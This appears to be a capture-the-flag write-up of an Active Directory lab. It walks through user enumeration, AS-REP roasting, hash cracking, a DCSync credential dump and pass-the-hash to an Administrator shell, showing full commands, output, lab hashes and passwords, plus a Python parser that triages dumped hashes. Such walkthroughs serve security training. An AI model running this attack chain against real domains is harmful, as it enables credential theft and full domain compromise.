Attacktive Directory
export IP=10.10.192.109
Setup
Impacket requires python version >=3.7.
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/
sudo pip3 install .
sudo python3 setup.py install
Bloodhound Neo4j
sudo apt install bloodhound neo4j
Kerbrute: brute force discovery of users, passwords and even password spray!
https://github.com/ropnop/kerbrute/releases
EvilWinRM
https://github.com/Hackplayers/evil-winrm
Enum
nmap
root@ip-10-10-47-56:~/AttacktiveDir# nmap -sC -sV 10.10.192.109 -oN nmap.initial
Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-25 17:09 BST
Stats: 0:00:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 71.83% done; ETC: 17:10 (0:00:15 remaining)
Nmap scan report for ip-10-10-192-109.eu-west-1.compute.internal (10.10.192.109)
Host is up (0.00041s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-06-25 16:10:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.loca
445/tcp open microsoft-ds?
1
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.loca
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2023-06-24T16:06:44
|_Not valid after: 2023-12-24T16:06:44
|_ssl-date: 2023-06-25T16:10:46+00:00; 0s from scanner time.
MAC Address: 02:52:FA:48:EB:61 (Unknown)
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: ATTACKTIVEDIREC, NetBIOS user: <unknown>, NetBIOS MAC: 02:52:fa:48:e
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-06-25 17:10:46
|_ start_date: 1600-12-31 23:58:45
Service detection performed. Please report any incorrect results at https://nmap.org/submit/
Nmap done: 1 IP address (1 host up) scanned in 105.10 seconds
enum4linux
enum4linux 10.10.192.109
Abusing Kerberos
kerbrute
User list: https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
Password list: https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
> These user and password lists are specific to this room. Normally, brute-forcing passwords against AD is not recommended because of account lockout. Username enumeration via Kerberos pre-authentication (what kerbrute userenum does) is safe in that respect: an AS-REQ for a non-existent or existing user does not count as a failed logon, so it does not lock anything, which is why it is the first step here.
root@ip-10-10-47-56:~/AttacktiveDir# ./kerbrute_linux_amd64 userenum --dc 10.10.192.109 -d s
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 06/25/23 - Ronnie Flathers @ropnop
2023/06/25 17:39:47 > Using KDC(s):
2023/06/25 17:39:47 > 10.10.192.109:88
2023/06/25 17:39:47 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:47 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:47 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:47 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:48 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:49 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:50 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:51 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:55 > [+] VALID USERNAME: [email protected]
2023/06/25 17:39:57 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:05 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:09 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:10 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:14 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:14 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:16 > [+] VALID USERNAME: [email protected]
2023/06/25 17:40:20 > Done! Tested 73317 usernames (16 valid) in 33.641 seconds
We can attack this with AS-REP roasting. AS-REP roasting works against user accounts that have "Do not require Kerberos preauthentication" set. Such an account does not have to prove knowledge of its password (the encrypted timestamp sent as pre-authentication data) before the KDC answers an AS-REQ; anyone who knows the username can request an AS-REP for it, and part of that reply is encrypted with a key derived from the account's password, so it can be cracked offline.
Retrieving the tickets: GetNPUsers.py (located in impacket/examples/GetNPUsers.py) queries the Key Distribution Center for AS-REP-roastable accounts and prints the crackable part in hashcat/john format. All it needs is a list of valid usernames, which is what the kerbrute run above gave us.
root@ip-10-10-47-56:~/AttacktiveDir# python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Getting TGT for svc-admin
[email protected]:5da54054107c7568f46b52473942dfa3$8c860941f70266326ca
We got an AS-REP hash for svc-admin without knowing its password; it can now be cracked offline.
hashcat
hashcat -m 18200 hash.txt passwordlist.txt
-m 18200 = Kerberos 5, etype 23, AS-REP (the RC4-HMAC format GetNPUsers.py printed)
Cracked password for svc-admin: management2005
smbclient
root@ip-10-10-47-56:~/AttacktiveDir# smbclient -U svc-admin -L 10.10.192.109
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.192.109 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
smbclient
root@ip-10-10-47-56:~/AttacktiveDir# smbclient -U svc-admin \\\\10.10.192.109\\backup
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 20:08:39 2020
.. D 0 Sat Apr 4 20:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 20:08:53 2020
8247551 blocks of size 4096. 3610988 blocks available
root@ip-10-10-47-56:~/AttacktiveDir# cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
root@ip-10-10-47-56:~/AttacktiveDir# base64 -d backup_credentials.txt
backup@spookysec.local:backup2517860
We got backup pass.
Well, it is the backup account for the Domain Controller, and it has a unique set of permissions: the directory replication rights, which allow every Active Directory change to be synced to this account, password hashes included. That is exactly what a DCSync (secretsdump.py -just-dc) abuses: it asks the DC to replicate the accounts over DRSUAPI, so no code execution on the DC is needed.
Secretsdump
root@ip-10-10-47-56:~/AttacktiveDir# secretsdump.py -just-dc
[email protected]
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d709
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a64
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cf
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab4553
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:6ccefc4d4705491321ca8a24d7fd8ee5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
... (remaining Kerberos keys omitted)
Administrator NT hash: 0e0363213e37b94221497260b0bcb4fc
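An added example (not part of the writeup or of Impacket): a small parser for secretsdump's `domain\user:rid:lmhash:nthash:::` lines that flags what you check first in a dump: accounts with the empty-password NT hash, accounts that still store an LM hash, and distinct accounts that share an NT hash (same password, so one cracked or passed hash opens several accounts). The sample text reuses the complete lines from the dump above and adds two constructed entries, svc-lab and ops-admin, that do not exist in the room, purely to exercise the reuse and LM checks.

```python
import re
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of "" (the Guest line above)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (LM storage disabled)

LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)


def parse_dump(text: str):
    """Yield a dict per NTDS line; banner, progress and Kerberos-key lines do not match."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()


def triage(text: str) -> dict:
    entries = list(parse_dump(text))
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "empty_password": sorted(e["user"] for e in entries if e["nt"] == EMPTY_NT),
        "lm_stored": sorted(e["user"] for e in entries if e["lm"] != EMPTY_LM),
        # Password reuse: one NT hash on more than one account; machine accounts are excluded.
        "shared_nt": {nt: sorted(users) for nt, users in by_nt.items()
                      if len([u for u in users if not u.endswith("$")]) > 1},
        # Well-known RIDs: 500 built-in Administrator, 502 krbtgt (Golden Ticket key).
        "privileged_rids": sorted(e["user"] for e in entries if e["rid"] in {"500", "502"}),
    }


# Constructed sample: the complete lines from the dump above plus two made-up accounts
# (svc-lab reuses the Administrator hash, ops-admin still has an LM hash stored).
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:6ccefc4d4705491321ca8a24d7fd8ee5:::
spookysec.local\\svc-lab:2001:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
spookysec.local\\ops-admin:2002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Kerberos keys grabbed
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

On a real engagement the same grouping is what tells you which high-privilege hash is also sitting on a low-privilege service account, and for the defender it is the list of accounts whose passwords must change after a DCSync (krbtgt twice, with a gap for replication).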
Pass the Hash
root@ip-10-10-47-56:~/AttacktiveDir# evil-winrm -i 10.10.192.109 -u Administrator -H 0e03632
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
thm-ad\administrator